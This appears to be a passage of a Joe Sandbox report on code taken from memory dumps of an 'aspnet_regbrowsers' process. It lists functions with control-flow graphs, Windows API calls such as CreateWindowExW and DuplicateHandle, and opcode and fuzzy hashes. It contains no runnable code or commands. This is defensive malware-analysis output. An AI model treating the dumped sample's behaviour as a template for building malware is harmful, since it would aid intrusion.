                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: cd7d1de1b661aabff8ab23117a80940f4bbf9fb6d113503108f4ea89d653ce18
                                • Instruction ID: bb12cf0d0e34124d86e4df2e8c4447bfd8d5898abe14608cc77f446f706dc92b
                                • Opcode Fuzzy Hash: cd7d1de1b661aabff8ab23117a80940f4bbf9fb6d113503108f4ea89d653ce18
                                • Instruction Fuzzy Hash: 7B5164B0D006498FDB54CFAAD649B9EBBF0EF88318F248459E119A3390DB349884CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013A5244, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 38 13a5244-13a52b6 39 13a52b8-13a52be 38->39 40 13a52c1-13a52c8 38->40 39->40 41 13a52ca-13a52d0 40->41 42 13a52d3-13a530b 40->42 41->42 43 13a5313-13a5372 CreateWindowExW 42->43 44 13a537b-13a53b3 43->44 45 13a5374-13a537a 43->45 49 13a53c0 44->49 50 13a53b5-13a53b8 44->50 45->44 51 13a53c1 49->51 50->49 51->51
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013A5362
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: f394965802d0d4550bdf82eb10fa967543306aa75a9c650312c2ed9288efff1d
                                • Instruction ID: 5d658b0a5de96b0a093412c413389f8aee1aa5e1172041e697ab1c506e7870ae
                                • Opcode Fuzzy Hash: f394965802d0d4550bdf82eb10fa967543306aa75a9c650312c2ed9288efff1d
                                • Instruction Fuzzy Hash: AD51D3B5D003099FDB14CFA9C884ADEBFB5FF88314F64812AE819AB250D7759885CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013A5250, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 52 13a5250-13a52b6 53 13a52b8-13a52be 52->53 54 13a52c1-13a52c8 52->54 53->54 55 13a52ca-13a52d0 54->55 56 13a52d3-13a5372 CreateWindowExW 54->56 55->56 58 13a537b-13a53b3 56->58 59 13a5374-13a537a 56->59 63 13a53c0 58->63 64 13a53b5-13a53b8 58->64 59->58 65 13a53c1 63->65 64->63 65->65
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013A5362
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 5dd71389609495d6c8939692ed3963d1c115c7abdecfb4b274a8e68e53c9d299
                                • Instruction ID: 2f6a358ff658b6d626bcd37876c9c935992acad2abade37c22b285aef748d8e1
                                • Opcode Fuzzy Hash: 5dd71389609495d6c8939692ed3963d1c115c7abdecfb4b274a8e68e53c9d299
                                • Instruction Fuzzy Hash: 6141A2B5D003099FDB14CF99C884ADEBFB5FF88314F64852AE819AB250D7759845CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013A6A34, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 66 13a6a34-13a7c2c 69 13a7cdc-13a7cfc call 13a3d74 66->69 70 13a7c32-13a7c37 66->70 77 13a7cff-13a7d0c 69->77 72 13a7c8a-13a7cc2 CallWindowProcW 70->72 73 13a7c39-13a7c70 70->73 74 13a7ccb-13a7cda 72->74 75 13a7cc4-13a7cca 72->75 79 13a7c79-13a7c88 73->79 80 13a7c72-13a7c78 73->80 74->77 75->74 79->77 80->79
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 013A7CB1
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 95b150427358f12e2eac56b8418a8d71c614996afd7bede39da7f0fda38b957c
                                • Instruction ID: f249d62f3ebdef53bbbcab9c5750014b08c8d02a441d279b1592f13135fcec28
                                • Opcode Fuzzy Hash: 95b150427358f12e2eac56b8418a8d71c614996afd7bede39da7f0fda38b957c
                                • Instruction Fuzzy Hash: 8F415DB5A00709CFDB14CF99C488AAABBF5FF88318F24C459D519AB321D735A941CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013A6D21, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 83 13a6d21-13a6dbc DuplicateHandle 84 13a6dbe-13a6dc4 83->84 85 13a6dc5-13a6de2 83->85 84->85
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013A6DAF
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 02218faccbec67c8416cada9eaad29faf7ef9300cde19b4a1a7942b88abd57d5
                                • Instruction ID: bff75cb034f777e02c3665b0a99afd6314766f1023ee11ccd97691ba15155bd2
                                • Opcode Fuzzy Hash: 02218faccbec67c8416cada9eaad29faf7ef9300cde19b4a1a7942b88abd57d5
                                • Instruction Fuzzy Hash: 6A21E4B59002499FDB10CFA9D884AEEBFF4EB48324F14841EE914A3310D774A954DFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013A6D28, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 88 13a6d28-13a6dbc DuplicateHandle 89 13a6dbe-13a6dc4 88->89 90 13a6dc5-13a6de2 88->90 89->90
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013A6DAF
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 2a030c0aa154be106a04f8b7591f67bf6f4f4c0701f14238764eab7dff594422
                                • Instruction ID: 332a0f065b2880f16d205c92ba0a3a656792498ace183ebc38c0bc6e32d58cbf
                                • Opcode Fuzzy Hash: 2a030c0aa154be106a04f8b7591f67bf6f4f4c0701f14238764eab7dff594422
                                • Instruction Fuzzy Hash: CD21D5B59002499FDB10CFAAD884ADEFFF8FB48324F14841AE914A3310D774A954CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013AC198, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 93 13ac198-13ac1ea 97 13ac1ec-13ac1ee 93->97 98 13ac1f0 93->98 99 13ac1f5-13ac200 97->99 98->99 100 13ac202-13ac233 RtlEncodePointer 99->100 101 13ac261-13ac26e 99->101 103 13ac23c-13ac25c 100->103 104 13ac235-13ac23b 100->104 103->101 104->103
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 013AC222
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: bf993a2799f635b72886a262228842b94792560bf48792f40303c3f9cecd8964
                                • Instruction ID: bbb2b357eca2af49700f2198abb0c5b07b8823afc5e1e20654e0f0a911c7585b
                                • Opcode Fuzzy Hash: bf993a2799f635b72886a262228842b94792560bf48792f40303c3f9cecd8964
                                • Instruction Fuzzy Hash: 83219A719007098FDB60DFA9D8493DABFF4EB44328F60982AD408B3B02C7386445CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013AC1A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 106 13ac1a8-13ac1ea 109 13ac1ec-13ac1ee 106->109 110 13ac1f0 106->110 111 13ac1f5-13ac200 109->111 110->111 112 13ac202-13ac233 RtlEncodePointer 111->112 113 13ac261-13ac26e 111->113 115 13ac23c-13ac25c 112->115 116 13ac235-13ac23b 112->116 115->113 116->115
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 013AC222
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: 8f1b771b2401b91507e26232a7e869cf3eccadcd4fe2d9d599176d268cbfbf39
                                • Instruction ID: 689612f7831d81e2c3fa6177d7b08ac03894232ad203c4b898978762c0f60b7e
                                • Opcode Fuzzy Hash: 8f1b771b2401b91507e26232a7e869cf3eccadcd4fe2d9d599176d268cbfbf39
                                • Instruction Fuzzy Hash: 321189709017098FDB50DFA9D9087DABFF4EB45328F60842AD408A3A02C7386448CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 058EE2B0, Relevance: .1, Instructions: 130COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e36a106582c31ba653c8a3c88aab44aac59679a95cd24e555141f0213ede465
                                • Instruction ID: 60fed444fe4a2a55c11fdf7ca3286ded5fa0d5450b5047c87f91d6d9c9a2e39e
                                • Opcode Fuzzy Hash: 4e36a106582c31ba653c8a3c88aab44aac59679a95cd24e555141f0213ede465
                                • Instruction Fuzzy Hash: 1851A030A046198FCB14DF69E494AADBBF5FB86318F568428D946EB385CB30EC41CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 058EE16A, Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 770412a4313aca529d64f606d6133fa6c6071c7f8253610aae7aa474f2d42c3a
                                • Instruction ID: 1b82023bc7f53da3e487854ec040f8ba7eb38915fdf97d475199d52bfddf0703
                                • Opcode Fuzzy Hash: 770412a4313aca529d64f606d6133fa6c6071c7f8253610aae7aa474f2d42c3a
                                • Instruction Fuzzy Hash: CA31A971D12349DFDB15CFB0C8446DCBBB2EF8A304F298A6AE401AB251DB716986CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 058EE188, Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0814c4160745b66425bc0add92654afad777e783736c757139b60ed7314f2e7
                                • Instruction ID: a99ffd822b68371b2272fc698402a973240017176c39129ecdd8a0f1a83eefd8
                                • Opcode Fuzzy Hash: a0814c4160745b66425bc0add92654afad777e783736c757139b60ed7314f2e7
                                • Instruction Fuzzy Hash: 57216D31D01209DBCB14DFA5D8496DDFBB6EF89314F24862AE412A7340DB716986CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 058EE2A0, Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000025.00000002.943953800.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_58e0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3823a70ca398c599ec4a43f5d7033b4ce07fad0b11663445188e7b12104ae67c
                                • Instruction ID: d7e3f47e950a81ca5f1641f84e70ce851002c26241f3c020f7d1e0eaa7462b9c
                                • Opcode Fuzzy Hash: 3823a70ca398c599ec4a43f5d7033b4ce07fad0b11663445188e7b12104ae67c
                                • Instruction Fuzzy Hash: 6E21BE70A006188FCB14DFA5E584AADBBF5BF4A308F668069E805EB250CB70EC45CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions